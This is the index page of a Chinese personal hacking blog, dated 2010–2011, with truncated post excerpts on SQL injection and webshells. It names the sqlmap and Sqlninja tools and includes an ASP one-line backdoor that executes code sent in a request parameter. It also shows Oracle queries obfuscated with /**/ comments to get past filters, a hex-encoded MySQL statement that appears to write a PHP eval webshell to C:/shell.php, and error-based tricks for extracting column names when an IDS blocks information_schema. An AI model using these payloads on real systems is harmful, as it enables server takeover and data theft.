孤狐浪子'Blog

黑夜给我了黑色的眼睛，我却用他来寻找光明的来临！

2011-11-21 3:52:30 阅读79 评论0 212011/11 Nov21

Sqlninja
网站：http://sqlninja.sourceforge.net/
支持数据库类型:Microsoft SQL Server.
sqlmap
网站：http://sqlmap.sourceforge.net/
支持数据库类型：MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

作者 | 2011-11-21 3:52:30 | 阅读(79) |评论(0) | 阅读全文>>

新型ASP一句话后门

2010-12-29 16:27:06 阅读337 评论2 292010/12 Dec29

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '

作者 | 2010-12-29 16:27:06 | 阅读(337) |评论(2) | 阅读全文>>

oracle分页查询

2010-12-29 16:22:52 阅读145 评论0 292010/12 Dec29

查询MICKEY.ADMIN表1-1000的记录
SELECT/**/*/**/FROM/**/(SELECT/**/A.*,ROWNUM/**/RN/**/FROM(SELECT/**/*/**/FROM/**/MICKEY.ADMIN/**/order/**/by/**/rowid)A/**/WHERE/**/ROWNUM<=1000)WHERE/**/RN>=1

查询MICKEY.ADMIN表1001-2000的记录
SELECT/**/*/**/FROM/**/(SELECT/**/A.*,ROWNUM/**/RN/**/FROM(SELECT/**/*/**/

作者 | 2010-12-29 16:22:52 | 阅读(145) |评论(0) | 阅读全文>>

mysql多语句导出一句话

2010-12-29 16:18:08 阅读315 评论0 292010/12 Dec29

mysql> use xssdb;
Database changed
mysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332
38323435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027
;
Query OK, 0 rows affected (0.00 sec)

mysql> prepare cmd from @a;
Query OK, 0 rows affected (0.00 sec)

作者 | 2010-12-29 16:18:08 | 阅读(315) |评论(0) | 阅读全文>>

MySQL Stacked Queries with SQL Injection...sort of

2010-12-29 16:15:57 阅读152 评论0 292010/12 Dec29

Security experts know that is possible to inject stacked queries on Microsoft SQL Server, when dealing with SQL Injections but not on other DBMS.

In the next few lines we'll describe a new technique that could allow an attacker to insert or update data also when there is a SQL Injection on select queries.
The most known attack also implemented on SQLMap is the takeover technique

作者 | 2010-12-29 16:15:57 | 阅读(152) |评论(0) | 阅读全文>>

绕过IDS过滤information_schema继续注入

2010-12-29 16:13:23 阅读322 评论0 292010/12 Dec29

原文:绕过IDS过滤information_schema继续注入

//利用MySQL出错爆出字段
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT *

作者 | 2010-12-29 16:13:23 | 阅读(322) |评论(0) | 阅读全文>>